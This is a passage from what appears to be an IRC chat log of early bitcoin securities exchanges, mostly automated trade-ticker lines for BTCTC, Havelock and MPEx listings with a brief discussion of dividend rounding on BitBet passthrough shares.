0.001824 = 4.56 BTC [-] Aug 04 08:58:28 [BTCTC] [LABCOIN] 456 @ 0.001822 = 0.8308 BTC [-] Aug 04 08:58:29 [BTCTC] [LABCOIN] 108 @ 0.00182 = 0.1966 BTC [-] Aug 04 08:58:30 [BTCTC] [LABCOIN] 651 @ 0.001819 = 1.1842 BTC [-] Aug 04 08:58:31 [BTCTC] [LABCOIN] 15 @ 0.001811 = 0.0272 BTC [-] Aug 04 08:58:32 [BTCTC] [LABCOIN] 102 @ 0.001811 = 0.1847 BTC [-] Aug 04 08:58:33 [BTCTC] [LABCOIN] 17 @ 0.00181 = 0.0308 BTC [-] Aug 04 08:58:34 [BTCTC] [LABCOIN] 600 @ 0.001809 = 1.0854 BTC [-] Aug 04 08:58:36 [BTCTC] [LABCOIN] 2769 @ 0.001802 = 4.9897 BTC [-] Aug 04 08:58:37 [BTCTC] [LABCOIN] 704 @ 0.001801 = 1.2679 BTC [-] Aug 04 08:58:38 [BTCTC] [LABCOIN] 4225 @ 0.0018 = 7.605 BTC [-] Aug 04 08:58:50 [BTCTC] [ACTIVEMINING] 38 @ 0.006379 = 0.2424 BTC [-] Aug 04 09:03:32 [HAVELOCK] [AM100] 6 @ 0.0377 = 0.2262 BTC [+] Aug 04 09:03:45 [BTCTC] [ACTIVEMINING] 20 @ 0.00638 = 0.1276 BTC [+] Aug 04 09:07:05 [BTCTC] [BTCGARDEN] 100 @ 0.0167 = 1.67 BTC [+] Aug 04 09:08:24 [HAVELOCK] [XBOND] 167 @ 0.00104987 = 0.1753 BTC [+] Aug 04 09:09:20 [MPEX] [S.BBET] [PAID] 1.72599136 BTC to 3`000`000 shares, 57 satoshi per share Aug 04 09:10:11 [HAVELOCK] [XBOND] 9 @ 0.00104986 = 0.0094 BTC [-] Aug 04 09:10:39 [BTCTC] [DMS.SELLING] 8 @ 0.0254 = 0.2032 BTC [-] Aug 04 09:10:40 [BTCTC] [DMS.SELLING] 157 @ 0.0255 = 4.0035 BTC [+] Aug 04 09:11:37 [BTCTC] [BTCGARDEN] 38 @ 0.0167 = 0.6346 BTC [+] Aug 04 09:14:26 [BTCTC] [TAT.ASICMINER] 1 @ 0.03926 BTC [-] Aug 04 09:15:38 [BTCTC] [TAT.ASICMINER] 2 @ 0.03926 = 0.0785 BTC [-] Aug 04 09:17:02 [BTCTC] [LABCOIN] 100 @ 0.001861 = 0.1861 BTC [+] Aug 04 09:18:44 [BTCTC] [ASICMINER-PT] 1 @ 4.066 BTC [-] Aug 04 09:22:12 [BTCTC] [LABCOIN] 26 @ 0.001795 = 0.0467 BTC [-] Aug 04 09:22:34 [BTCTC] [ACTIVEMINING] 8 @ 0.00638 = 0.051 BTC [+] Aug 04 09:22:44 [BTCTC] [LABCOIN] 30 @ 0.001795 = 0.0539 BTC [-] Aug 04 09:23:50 [BTCTC] [LABCOIN] 100 @ 0.0018 = 0.18 BTC [+] Aug 04 09:29:52 [BTCTC] [BTCGARDEN] 105 @ 0.0164 = 1.722 BTC [-] Aug 04 09:31:08 [BTCTC] [LABCOIN] 10 @ 0.001792 = 0.0179 BTC [-] Aug 04 09:31:09 [BTCTC] [LABCOIN] 5 @ 0.001788 = 0.0089 BTC [-] Aug 04 09:31:11 [BTCTC] [LABCOIN] 1000 @ 0.001787 = 1.787 BTC [-] Aug 04 09:31:25 [BTCTC] [LABCOIN] 4000 @ 0.001786 = 7.144 BTC [-] Aug 04 09:31:26 [BTCTC] [LABCOIN] 1261 @ 0.001785 = 2.2509 BTC [-] Aug 04 09:33:00 [MPEX] [S.BBET] 160 @ 0.00099999 = 0.16 BTC [-] Aug 04 09:33:57 [MPEX] [S.MPOE] 6616 @ 0.00082855 = 5.4817 BTC [-] Aug 04 09:34:03 [MPEX] [S.MPOE] 300 @ 0.00082639 = 0.2479 BTC [-] Aug 04 09:34:05 [MPEX] [S.MPOE] 2184 @ 0.00082633 = 1.8047 BTC [-] Aug 04 09:34:10 [MPEX] [S.MPOE] 193 @ 0.00083132 = 0.1604 BTC [+] Aug 04 09:42:33 !ticker M S.BBET Aug 04 09:42:34 [MPEX:S.BBET] 1D: 0.00099999 / 0.00099999 / 0.00099999 (160 shares, 0.16 BTC), 7D: 0.00099999 / 0.00099999 / 0.00099999 (1360 shares, 1.36 BTC), 30D: 0.0005505 / 0.00062236 / 0.00102899 (24759 shares, 15.41 BTC) Aug 04 09:42:53 !ticker M S.MPOE Aug 04 09:42:54 [MPEX:S.MPOE] 1D: 0.00082043 / 0.00082745 / 0.00083132 (104725 shares, 86.66 BTC), 7D: 0.0007936 / 0.00081098 / 0.00083132 (2234006 shares, 1,811.75 BTC), 30D: 0.0007725 / 0.0008196 / 0.00097228 (10634479 shares, 8,716.03 BTC) Aug 04 09:44:12 [BTCTC] [ACTIVEMINING] 8 @ 0.00638 = 0.051 BTC [+] Aug 04 09:44:46 [BTCTC] [LABCOIN] 3739 @ 0.001785 = 6.6741 BTC [-] Aug 04 09:46:09 [BTCTC] [ACTIVEMINING] 500 @ 0.00638 = 3.19 BTC [+] Aug 04 09:47:10 [BTCTC] [ACTIVEMINING] 500 @ 0.00639 = 3.195 BTC [+] Aug 04 09:49:36 [BTCTC] [PAJKA.BOND] 59 @ 0.0259 = 1.5281 BTC [-] Aug 04 09:52:49 [BTCTC] [BTCGARDEN] 928 @ 0.0164 = 15.2192 BTC [-] Aug 04 09:52:51 [BTCTC] [BTCGARDEN] 1 @ 0.0164 BTC [-] Aug 04 09:52:52 [BTCTC] [BTCGARDEN] 14 @ 0.01631 = 0.2283 BTC [-] Aug 04 09:52:53 [BTCTC] [BTCGARDEN] 3 @ 0.0163 = 0.0489 BTC [-] Aug 04 09:52:54 [BTCTC] [BTCGARDEN] 70 @ 0.01621 = 1.1347 BTC [-] Aug 04 09:52:56 [BTCTC] [BTCGARDEN] 70 @ 0.0162 = 1.134 BTC [-] Aug 04 10:01:41 [BTCTC] [ACTIVEMINING] 2 @ 0.00639 = 0.0128 BTC [+] Aug 04 10:08:43 [BTCTC] [ACTIVEMINING] 164 @ 0.00639 = 1.048 BTC [+] Aug 04 10:11:40 [BTCTC] [TAT.MINIGAME] 1 @ 0.000254 BTC [+] Aug 04 10:12:19 [BTCTC] [ACTIVEMINING] 898 @ 0.006423 = 5.7679 BTC [+] Aug 04 10:15:54 [BTCTC] [ACTIVEMINING] 102 @ 0.006423 = 0.6551 BTC [+] Aug 04 10:15:56 [BTCTC] [ACTIVEMINING] 101 @ 0.006423 = 0.6487 BTC [+] Aug 04 10:15:57 [BTCTC] [ACTIVEMINING] 100 @ 0.00643 = 0.643 BTC [+] Aug 04 10:17:37 [BTCTC] [ACTIVEMINING] 141 @ 0.006447 = 0.909 BTC [+] Aug 04 10:17:38 [BTCTC] [ACTIVEMINING] 250 @ 0.006498 = 1.6245 BTC [+] Aug 04 10:17:39 [BTCTC] [ACTIVEMINING] 650 @ 0.0065 = 4.225 BTC [+] Aug 04 10:17:40 [BTCTC] [ACTIVEMINING] 51 @ 0.0065 = 0.3315 BTC [+] Aug 04 10:17:41 [BTCTC] [ACTIVEMINING] 100 @ 0.0065 = 0.65 BTC [+] Aug 04 10:17:42 [BTCTC] [ACTIVEMINING] 100 @ 0.0065 = 0.65 BTC [+] Aug 04 10:17:43 [BTCTC] [ACTIVEMINING] 62 @ 0.0065 = 0.403 BTC [+] Aug 04 10:18:36 [BTCTC] [BASIC-MINING] 2 @ 0.3903 = 0.7806 BTC [-] Aug 04 10:22:55 [BTCTC] [LABCOIN] 5 @ 0.001799 = 0.009 BTC [+] Aug 04 10:22:56 [BTCTC] [LABCOIN] 10 @ 0.0018 = 0.018 BTC [+] Aug 04 10:25:16 [BTCTC] [LABCOIN] 10 @ 0.001824 = 0.0182 BTC [+] Aug 04 10:28:38 [BTCTC] [ACTIVEMINING] 2 @ 0.0065 = 0.013 BTC [+] Aug 04 10:33:54 [BTCTC] [ACTIVEMINING] 115 @ 0.0065 = 0.7475 BTC [+] Aug 04 10:35:20 [BTCTC] [COGNITIVE] 12 @ 0.4342 = 5.2104 BTC [+] Aug 04 10:36:06 [BTCTC] [ASICMINER-PT] 1 @ 4.014 BTC [-] Aug 04 10:36:28 [BTCTC] [ACTIVEMINING] 370 @ 0.0065 = 2.405 BTC [+] Aug 04 10:36:29 [BTCTC] [ACTIVEMINING] 200 @ 0.006587 = 1.3174 BTC [+] Aug 04 10:36:30 [BTCTC] [ACTIVEMINING] 20 @ 0.006588 = 0.1318 BTC [+] Aug 04 10:36:31 [BTCTC] [ACTIVEMINING] 100 @ 0.006588 = 0.6588 BTC [+] Aug 04 10:36:32 [BTCTC] [ACTIVEMINING] 20 @ 0.006588 = 0.1318 BTC [+] Aug 04 10:37:58 [BTCTC] [ACTIVEMINING] 50 @ 0.006599 = 0.33 BTC [+] Aug 04 10:38:23 [BTCTC] [ACTIVEMINING] 950 @ 0.006599 = 6.2691 BTC [+] Aug 04 10:38:49 [BTCTC] [TAT.ASICMINER] 10 @ 0.03927 = 0.3927 BTC [+] Aug 04 10:43:52 [BTCTC] [ACTIVEMINING] 25 @ 0.00675 = 0.1688 BTC [+] Aug 04 10:44:29 [BTCTC] [BTCGARDEN] 50 @ 0.01669 = 0.8345 BTC [+] Aug 04 10:44:51 [MPEX] [S.MPOE] 3700 @ 0.00083054 = 3.073 BTC [-] Aug 04 10:45:07 [BTCTC] [LABCOIN] 10 @ 0.001824 = 0.0182 BTC [+] Aug 04 10:47:25 [BTCTC] [LABCOIN] 20 @ 0.001824 = 0.0365 BTC [+] Aug 04 10:52:18 [BTCTC] [BTCGARDEN] 3 @ 0.01669 = 0.0501 BTC [+] Aug 04 10:52:54 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.0027 BTC [+] Aug 04 10:52:56 [BTCTC] [TAT.VIRTUALMINE] 4 @ 0.002799 = 0.0112 BTC [+] Aug 04 10:54:49 [BTCTC] [ACTIVEMINING] 489 @ 0.006749 = 3.3003 BTC [-] Aug 04 10:56:28 [BTCTC] [DMS.MINING] 1 @ 0.008328 BTC [+] Aug 04 10:57:09 [BTCTC] [DMS.MINING] 1 @ 0.008326 BTC [-] Aug 04 10:59:59 [HAVELOCK] [AM100] 1 @ 0.0384499 BTC [+] Aug 04 11:00:40 [BTCTC] [BTCGARDEN] 40 @ 0.01669 = 0.6676 BTC [+] Aug 04 11:00:41 [BTCTC] [BTCGARDEN] 1 @ 0.01669 BTC [+] Aug 04 11:02:54 [BTCTC] [BTCGARDEN] 120 @ 0.0167 = 2.004 BTC [+] Aug 04 11:07:15 [BTCTC] [LABCOIN] 21 @ 0.001771 = 0.0372 BTC [-] Aug 04 11:07:17 [BTCTC] [LABCOIN] 500 @ 0.00177 = 0.885 BTC [-] Aug 04 11:07:18 [BTCTC] [LABCOIN] 2 @ 0.001768 = 0.0035 BTC [-] Aug 04 11:07:19 [BTCTC] [LABCOIN] 386 @ 0.001768 = 0.6824 BTC [-] Aug 04 11:07:21 [BTCTC] [LABCOIN] 2900 @ 0.001767 = 5.1243 BTC [-] Aug 04 11:07:22 [BTCTC] [LABCOIN] 581 @ 0.001767 = 1.0266 BTC [-] Aug 04 11:07:23 [BTCTC] [ACTIVEMINING] 11 @ 0.006749 = 0.0742 BTC [-] Aug 04 11:07:24 [BTCTC] [LABCOIN] 9479 @ 0.001766 = 16.7399 BTC [-] Aug 04 11:09:13 [BTCTC] [BTCGARDEN] 171 @ 0.0167 = 2.8557 BTC [+] Aug 04 11:09:13 [BTCTC] [BTCGARDEN] 1 @ 0.0167 BTC [+] Aug 04 11:13:53 [BTCTC] [BTCGARDEN] 42 @ 0.01689 = 0.7094 BTC [+] Aug 04 11:17:38 [BTCTC] [ACTIVEMINING] 1 @ 0.00669 BTC [-] Aug 04 11:17:41 [BTCTC] [ACTIVEMINING] 11 @ 0.006689 = 0.0736 BTC [-] Aug 04 11:17:43 [BTCTC] [ACTIVEMINING] 10 @ 0.006655 = 0.0666 BTC [-] Aug 04 11:17:45 [BTCTC] [ACTIVEMINING] 2 @ 0.006516 = 0.013 BTC [-] Aug 04 11:17:47 [BTCTC] [ACTIVEMINING] 11 @ 0.006515 = 0.0717 BTC [-] Aug 04 11:17:54 [BTCTC] [ACTIVEMINING] 35 @ 0.006361 = 0.2226 BTC [-] Aug 04 11:17:58 [BTCTC] [ACTIVEMINING] 265 @ 0.006699 = 1.7752 BTC [+] Aug 04 11:18:35 [BTCTC] [BTCGARDEN] 15 @ 0.0167 = 0.2505 BTC [-] Aug 04 11:19:37 [BTCTC] [BASIC-MINING] 3 @ 0.385 = 1.155 BTC [-] Aug 04 11:21:42 [BTCTC] [BASIC-MINING] 3 @ 0.385 = 1.155 BTC [-] Aug 04 11:22:44 [BTCTC] [ACTIVEMINING] 2 @ 0.006698 = 0.0134 BTC [-] Aug 04 11:22:46 [BTCTC] [ACTIVEMINING] 35 @ 0.006699 = 0.2345 BTC [+] Aug 04 11:22:51 [BTCTC] [BTCGARDEN] 53 @ 0.0167 = 0.8851 BTC [-] Aug 04 11:22:51 [BTCTC] [BTCGARDEN] 1 @ 0.0167 BTC [-] Aug 04 11:22:59 [BTCTC] [COGNITIVE] 19 @ 0.479 = 9.101 BTC [+] Aug 04 11:23:01 [BTCTC] [COGNITIVE] 1 @ 0.479 BTC [+] Aug 04 11:23:17 [BTCTC] [COGNITIVE] 1 @ 0.4841 BTC [+] Aug 04 11:26:22 [BTCTC] [ACTIVEMINING] 1 @ 0.006624 BTC [-] Aug 04 11:26:24 [BTCTC] [ACTIVEMINING] 25 @ 0.006623 = 0.1656 BTC [-] Aug 04 11:26:25 [BTCTC] [ACTIVEMINING] 18 @ 0.006622 = 0.1192 BTC [-] Aug 04 11:26:26 [BTCTC] [ACTIVEMINING] 100 @ 0.006622 = 0.6622 BTC [-] Aug 04 11:26:27 [BTCTC] [ACTIVEMINING] 15 @ 0.006621 = 0.0993 BTC [-] Aug 04 11:26:29 [BTCTC] [ACTIVEMINING] 3 @ 0.0066 = 0.0198 BTC [-] Aug 04 11:26:30 [BTCTC] [ACTIVEMINING] 7 @ 0.006382 = 0.0447 BTC [-] Aug 04 11:26:30 [BTCTC] [ACTIVEMINING] 30 @ 0.006381 = 0.1914 BTC [-] Aug 04 11:26:31 [BTCTC] [ACTIVEMINING] 801 @ 0.006258 = 5.0127 BTC [-] Aug 04 11:26:52 [MPEX] [S.MG] 1 @ 0.00025 BTC [+] Aug 04 11:27:20 [BTCTC] [ACTIVEMINING] 25 @ 0.006707 = 0.1677 BTC [+] Aug 04 11:27:21 [BTCTC] [ACTIVEMINING] 30 @ 0.006708 = 0.2012 BTC [+] Aug 04 11:32:17 [BTCTC] [LABCOIN] 21 @ 0.001766 = 0.0371 BTC [-] Aug 04 11:32:19 [BTCTC] [LABCOIN] 100 @ 0.001765 = 0.1765 BTC [-] Aug 04 11:32:20 [BTCTC] [LABCOIN] 20 @ 0.001761 = 0.0352 BTC [-] Aug 04 11:32:21 [BTCTC] [LABCOIN] 150 @ 0.001761 = 0.2642 BTC [-] Aug 04 11:32:23 [BTCTC] [LABCOIN] 70 @ 0.00175 = 0.1225 BTC [-] Aug 04 11:32:24 [BTCTC] [LABCOIN] 500 @ 0.00175 = 0.875 BTC [-] Aug 04 11:32:24 [BTCTC] [LABCOIN] 2900 @ 0.00174 = 5.046 BTC [-] Aug 04 11:32:25 [BTCTC] [LABCOIN] 400 @ 0.00173 = 0.692 BTC [-] Aug 04 11:32:26 [BTCTC] [LABCOIN] 250 @ 0.001728 = 0.432 BTC [-] Aug 04 11:32:27 [BTCTC] [LABCOIN] 1200 @ 0.001727 = 2.0724 BTC [-] Aug 04 11:32:28 [BTCTC] [LABCOIN] 4291 @ 0.001726 = 7.4063 BTC [-] Aug 04 11:35:35 [BTCTC] [TAT.ASICMINER] 1 @ 0.039 BTC [-] Aug 04 11:35:36 [BTCTC] [ASICMINER-PT] 1 @ 4.011 BTC [-] Aug 04 11:36:25 [BTCTC] [ASICMINER-PT] 1 @ 4.011 BTC [-] Aug 04 11:37:52 [BTCTC] [ACTIVEMINING] 185 @ 0.006709 = 1.2412 BTC [+] Aug 04 11:39:30 [MPEX] [S.MPOE] 2100 @ 0.00083054 = 1.7441 BTC [-] Aug 04 11:39:36 [MPEX] [S.MPOE] 550 @ 0.00083132 = 0.4572 BTC [+] Aug 04 11:42:37 [BTCTC] [BTCGARDEN] 100 @ 0.01623 = 1.623 BTC [-] Aug 04 11:42:39 [BTCTC] [BTCGARDEN] 16 @ 0.01623 = 0.2597 BTC [-] Aug 04 11:43:49 btct login: "access temporarily denied"? Aug 04 11:45:23 [BTCTC] [ASICMINER-PT] 1 @ 4.011 BTC [-] Aug 04 11:45:52 [BTCTC] [ASICMINER-PT] 2 @ 4.01 = 8.02 BTC [-] Aug 04 11:46:22 [BTCTC] [BITVPS] 67 @ 0.00244 = 0.1635 BTC [-] Aug 04 11:47:46 [HAVELOCK] [SMG] 1389 @ 0.0002446 = 0.3397 BTC [-] Aug 04 11:50:09 [BTCTC] [RSM] 1 @ 0.01136 BTC [+] Aug 04 11:50:11 [BTCTC] [RSM] 1 @ 0.01136 BTC [+] Aug 04 11:50:12 [BTCTC] [RSM] 59 @ 0.01135 = 0.6697 BTC [-] Aug 04 11:50:23 [BTCTC] [RSM] 18 @ 0.01135 = 0.2043 BTC [-] Aug 04 11:50:25 [BTCTC] [RSM] 20 @ 0.0113 = 0.226 BTC [-] Aug 04 11:50:26 [BTCTC] [ACTIVEMINING] 25 @ 0.006501 = 0.1625 BTC [-] Aug 04 11:50:58 [BTCTC] [ACTIVEMINING] 25 @ 0.006501 = 0.1625 BTC [-] Aug 04 11:51:35 [BTCTC] [ACTIVEMINING] 25 @ 0.006501 = 0.1625 BTC [-] Aug 04 11:55:37 [BTCTC] [LABCOIN] 10 @ 0.001799 = 0.018 BTC [+] Aug 04 11:55:38 [BTCTC] [LABCOIN] 50 @ 0.001735 = 0.0868 BTC [-] Aug 04 11:55:39 [BTCTC] [LABCOIN] 57 @ 0.001731 = 0.0987 BTC [-] Aug 04 11:55:40 [BTCTC] [LABCOIN] 2000 @ 0.001731 = 3.462 BTC [-] Aug 04 11:55:41 [BTCTC] [LABCOIN] 300 @ 0.00173 = 0.519 BTC [-] Aug 04 11:55:43 [BTCTC] [LABCOIN] 4619 @ 0.001727 = 7.977 BTC [-] Aug 04 11:55:44 [BTCTC] [LABCOIN] 709 @ 0.001726 = 1.2237 BTC [-] Aug 04 11:55:45 [BTCTC] [LABCOIN] 1909 @ 0.001725 = 3.293 BTC [-] Aug 04 11:55:46 [BTCTC] [LABCOIN] 2900 @ 0.001722 = 4.9938 BTC [-] Aug 04 11:55:47 [BTCTC] [LABCOIN] 5000 @ 0.001721 = 8.605 BTC [-] Aug 04 11:55:48 [BTCTC] [LABCOIN] 1100 @ 0.001716 = 1.8876 BTC [-] Aug 04 11:55:49 [BTCTC] [LABCOIN] 41 @ 0.001711 = 0.0702 BTC [-] Aug 04 11:55:49 [BTCTC] [LABCOIN] 350 @ 0.001711 = 0.5989 BTC [-] Aug 04 11:55:50 [BTCTC] [LABCOIN] 3000 @ 0.001711 = 5.133 BTC [-] Aug 04 11:55:51 [BTCTC] [LABCOIN] 2324 @ 0.00171 = 3.974 BTC [-] Aug 04 11:57:48 [MPEX] [S.MPOE] 4100 @ 0.00083013 = 3.4035 BTC [-] Aug 04 11:57:49 [MPEX] [S.MPOE] 50 @ 0.00082863 = 0.0414 BTC [-] Aug 04 11:58:17 [BTCTC] [DMS.MINING] 111 @ 0.008328 = 0.9244 BTC [+] Aug 04 11:59:29 [BTCTC] [DMS.SELLING] 141 @ 0.0255 = 3.5955 BTC [+] Aug 04 12:03:21 [MPEX] [S.MPOE] 9850 @ 0.00082863 = 8.162 BTC [-] Aug 04 12:04:08 [BTCTC] [ACTIVEMINING] 7 @ 0.006592 = 0.0461 BTC [+] Aug 04 12:04:10 [BTCTC] [ACTIVEMINING] 25 @ 0.006593 = 0.1648 BTC [+] Aug 04 12:04:11 [BTCTC] [ACTIVEMINING] 100 @ 0.006595 = 0.6595 BTC [+] Aug 04 12:04:57 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.002799 BTC [+] Aug 04 12:05:38 [HAVELOCK] [SDSTM] 10 @ 0.00718312 = 0.0718 BTC [-] Aug 04 12:05:52 [BTCTC] [ACTIVEMINING] 25 @ 0.006601 = 0.165 BTC [+] Aug 04 12:06:21 [BTCTC] [ACTIVEMINING] 25 @ 0.006601 = 0.165 BTC [+] Aug 04 12:06:45 [BTCTC] [BITVPS] 15 @ 0.002449 = 0.0367 BTC [+] Aug 04 12:06:53 [BTCTC] [ACTIVEMINING] 25 @ 0.006601 = 0.165 BTC [+] Aug 04 12:18:24 [BTCTC] [ACTIVEMINING] 3 @ 0.006221 = 0.0187 BTC [-] Aug 04 12:18:25 [BTCTC] [ACTIVEMINING] 15 @ 0.00622 = 0.0933 BTC [-] Aug 04 12:18:27 [BTCTC] [ACTIVEMINING] 25 @ 0.006203 = 0.1551 BTC [-] Aug 04 12:18:28 [BTCTC] [ACTIVEMINING] 100 @ 0.006202 = 0.6202 BTC [-] Aug 04 12:18:29 [BTCTC] [ACTIVEMINING] 1 @ 0.00617 BTC [-] Aug 04 12:18:30 [BTCTC] [ACTIVEMINING] 5 @ 0.006169 = 0.0308 BTC [-] Aug 04 12:18:31 [BTCTC] [ACTIVEMINING] 374 @ 0.006161 = 2.3042 BTC [-] Aug 04 12:19:46 [BTCTC] [ACTIVEMINING] 4 @ 0.006301 = 0.0252 BTC [+] Aug 04 12:25:22 [BTCTC] [ACTIVEMINING] 25 @ 0.006551 = 0.1638 BTC [+] Aug 04 12:27:41 [MPEX] [S.MPOE] 1700 @ 0.00083132 = 1.4132 BTC [+] Aug 04 12:30:27 [BTCTC] [PAJKA.BOND] 6 @ 0.02133 = 0.128 BTC [-] Aug 04 12:30:30 [BTCTC] [ACTIVEMINING] 1 @ 0.0065 BTC [-] Aug 04 12:32:40 [BTCTC] [BTCGARDEN] 50 @ 0.0163 = 0.815 BTC [+] Aug 04 12:33:45 [HAVELOCK] [SMG] 10 @ 0.000236 = 0.0024 BTC [-] Aug 04 12:34:06 [BTCTC] [BTCGARDEN] 29 @ 0.01678 = 0.4866 BTC [+] Aug 04 12:34:09 [BTCTC] [DMS.MINING] 100 @ 0.008399 = 0.8399 BTC [+] Aug 04 12:34:16 [BTCTC] [ACTIVEMINING] 25 @ 0.006311 = 0.1578 BTC [-] Aug 04 12:34:31 [BTCTC] [ACTIVEMINING] 3 @ 0.006497 = 0.0195 BTC [+] Aug 04 12:34:37 [HAVELOCK] [SMG] 90 @ 0.000235 = 0.0212 BTC [-] Aug 04 12:34:43 [BTCTC] [ACTIVEMINING] 102 @ 0.00631 = 0.6436 BTC [-] Aug 04 12:35:39 [BTCTC] [DMS.MINING] 2 @ 0.008399 = 0.0168 BTC [+] Aug 04 12:35:40 [BTCTC] [LABCOIN] 40 @ 0.001801 = 0.072 BTC [+] Aug 04 12:36:01 [BTCTC] [TAT.ASICMINER] 2 @ 0.039 = 0.078 BTC [-] Aug 04 12:36:03 [BTCTC] [TAT.ASICMINER] 1 @ 0.039 BTC [-] Aug 04 12:36:04 [BTCTC] [TAT.ASICMINER] 52 @ 0.039 = 2.028 BTC [-] Aug 04 12:37:33 [BTCTC] [LABCOIN] 232 @ 0.001801 = 0.4178 BTC [+] Aug 04 12:38:40 [BTCTC] [ACTIVEMINING] 50 @ 0.006311 = 0.3156 BTC [+] Aug 04 12:39:01 [BTCTC] [TAT.ASICMINER] 1 @ 0.03926 BTC [+] Aug 04 12:39:02 [BTCTC] [TAT.ASICMINER] 1 @ 0.03926 BTC [+] Aug 04 12:39:04 [BTCTC] [TAT.ASICMINER] 4 @ 0.03927 = 0.1571 BTC [+] Aug 04 12:39:41 [BTCTC] [TAT.ASICMINER] 1 @ 0.03927 BTC [+] Aug 04 12:42:17 [BTCTC] [ACTIVEMINING] 25 @ 0.006348 = 0.1587 BTC [+] Aug 04 12:42:25 [BTCTC] [LABCOIN] 1 @ 0.0018 BTC [-] Aug 04 12:44:08 [BTCTC] [LABCOIN] 2 @ 0.0018 = 0.0036 BTC [-] Aug 04 12:44:21 [BTCTC] [TAT.ASICMINER] 1 @ 0.03941 BTC [+] Aug 04 12:44:22 [BTCTC] [TAT.ASICMINER] 4 @ 0.03942 = 0.1577 BTC [+] Aug 04 12:45:53 [BTCTC] [LABCOIN] 2 @ 0.001803 = 0.0036 BTC [+] Aug 04 12:48:00 [HAVELOCK] [XBOND] 1 @ 0.0010457 BTC [-] Aug 04 12:48:02 [HAVELOCK] [XBOND] 1 @ 0.00103 BTC [-] Aug 04 12:48:04 [HAVELOCK] [XBOND] 1333 @ 0.001025 = 1.3663 BTC [-] Aug 04 12:48:06 [HAVELOCK] [XBOND] 981 @ 0.00102 = 1.0006 BTC [-] Aug 04 12:48:08 [HAVELOCK] [XBOND] 25 @ 0.001011 = 0.0253 BTC [-] Aug 04 12:48:10 [HAVELOCK] [XBOND] 2370 @ 0.00101 = 2.3937 BTC [-] Aug 04 12:48:13 [HAVELOCK] [XBOND] 250 @ 0.001008 = 0.252 BTC [-] Aug 04 12:48:15 [HAVELOCK] [XBOND] 1369 @ 0.0010055 = 1.3765 BTC [-] Aug 04 12:48:41 [HAVELOCK] [SMG] 25 @ 0.0002447 = 0.0061 BTC [+] Aug 04 12:49:38 [BTCTC] [BTCGARDEN] 1 @ 0.01677 BTC [-] Aug 04 12:50:59 [BTCTC] [ACTIVEMINING] 1 @ 0.00625 BTC [-] Aug 04 12:51:56 [BTCTC] [LABCOIN] 4 @ 0.001801 = 0.0072 BTC [-] Aug 04 12:56:49 [BTCTC] [LABCOIN] 405 @ 0.001799 = 0.7286 BTC [-] Aug 04 12:59:00 [HAVELOCK] [SMG] 16 @ 0.0002447 = 0.0039 BTC [+] Aug 04 13:01:01 [BTCTC] [ACTIVEMINING] 25 @ 0.006289 = 0.1572 BTC [+] Aug 04 13:01:02 [BTCTC] [ACTIVEMINING] 9 @ 0.00629 = 0.0566 BTC [+] Aug 04 13:02:34 [BTCTC] [ACTIVEMINING] 25 @ 0.006202 = 0.1551 BTC [-] Aug 04 13:03:38 [BTCTC] [LABCOIN] 1 @ 0.001798 BTC [-] Aug 04 13:05:33 [BTCTC] [ACTIVEMINING] 1 @ 0.006497 BTC [+] Aug 04 13:10:35 [BTCTC] [ACTIVEMINING] 25 @ 0.006351 = 0.1588 BTC [-] Aug 04 13:11:09 [BTCTC] [ACTIVEMINING] 25 @ 0.006351 = 0.1588 BTC [-] Aug 04 13:12:08 [BTCTC] [ASICMINER-PT] 1 @ 4.001 BTC [-] Aug 04 13:12:11 [BTCTC] [ACTIVEMINING] 50 @ 0.006352 = 0.3176 BTC [+] Aug 04 13:13:04 [BTCTC] [LABCOIN] 5 @ 0.001799 = 0.009 BTC [+] Aug 04 13:13:05 [BTCTC] [LABCOIN] 332 @ 0.0018 = 0.5976 BTC [+] Aug 04 13:19:30 [BTCTC] [LABCOIN] 1 @ 0.001797 BTC [-] Aug 04 13:21:03 [BTCTC] [LABCOIN] 1 @ 0.001789 BTC [-] Aug 04 13:22:02 [BTCTC] [LABCOIN] 1 @ 0.001789 BTC [-] Aug 04 13:23:28 [BTCTC] [TAT.ASICMINER] 3 @ 0.03911 = 0.1173 BTC [-] Aug 04 13:23:30 [BTCTC] [TAT.ASICMINER] 1 @ 0.03911 BTC [-] Aug 04 13:23:31 [BTCTC] [TAT.ASICMINER] 16 @ 0.03911 = 0.6258 BTC [-] Aug 04 13:25:03 [BTCTC] [LABCOIN] 337 @ 0.001794 = 0.6046 BTC [+] Aug 04 13:26:17 [BTCTC] [LABCOIN] 2023 @ 0.001798 = 3.6374 BTC [+] Aug 04 13:27:11 [BTCTC] [LABCOIN] 11 @ 0.001799 = 0.0198 BTC [+] Aug 04 13:30:00 Thinking about stirring shit about how passthroughs pay out BitBet divs. Aug 04 13:30:07 One share gets 57.5 satoshi and rounding error is thus almost 2% . Aug 04 13:30:52 shit is there to be stirred Aug 04 13:31:03 Can you go into more details? Aug 04 13:31:15 How do passthroughts have anything to do with BitBet? Aug 04 13:31:19 well its an old practice Aug 04 13:31:22 passthroughs* Aug 04 13:31:27 ah that. Aug 04 13:32:16 kleeck, not sure abut BTCT but BF allows to pay dividend only whole satoshi per share Aug 04 13:32:46 BF restricts dividends? Aug 04 13:32:53 MPEx (and CoinBR) on the other side, rounds only a result after multiplying by quantity Aug 04 13:33:25 Oh. You're talking rounding. Aug 04 13:35:03 well at least you get something here Aug 04 13:35:09 at bitstamp, you have to pay to get robbed Aug 04 13:35:15 -have Aug 04 13:39:31 [BTCTC] [ASICMINER-PT] 1 @ 4.001 BTC [-] Aug 04 13:39:33 [BTCTC] [ASICMINER-PT] 1 @ 4.001 BTC [-] Aug 04 13:39:33 [BTCTC] [ASICMINER-PT] 24 @ 4 = 96 BTC [-] Aug 04 13:39:34 [BTCTC] [ASICMINER-PT] 6 @ 4 = 24 BTC [-] Aug 04 13:48:06 [BTCTC] [LABCOIN] 1170 @ 0.001798 = 2.1037 BTC [-] Aug 04 13:48:17 [BTCTC] [DMS.SELLING] 44 @ 0.02573 = 1.1321 BTC [+] Aug 04 13:48:32 [BTCTC] [LABCOIN] 1 @ 0.001797 BTC [-] Aug 04 13:52:39 [HAVELOCK] [XBOND] 1 @ 0.00104984 BTC [+] Aug 04 13:53:10 [BTCTC] [ACTIVEMINING] 20 @ 0.006375 = 0.1275 BTC [+] Aug 04 13:55:50 [BTCTC] [LABCOIN] 8000 @ 0.001795 = 14.36 BTC [-] Aug 04 14:03:04 [BTCTC] [LABCOIN] 11 @ 0.001799 = 0.0198 BTC [+] Aug 04 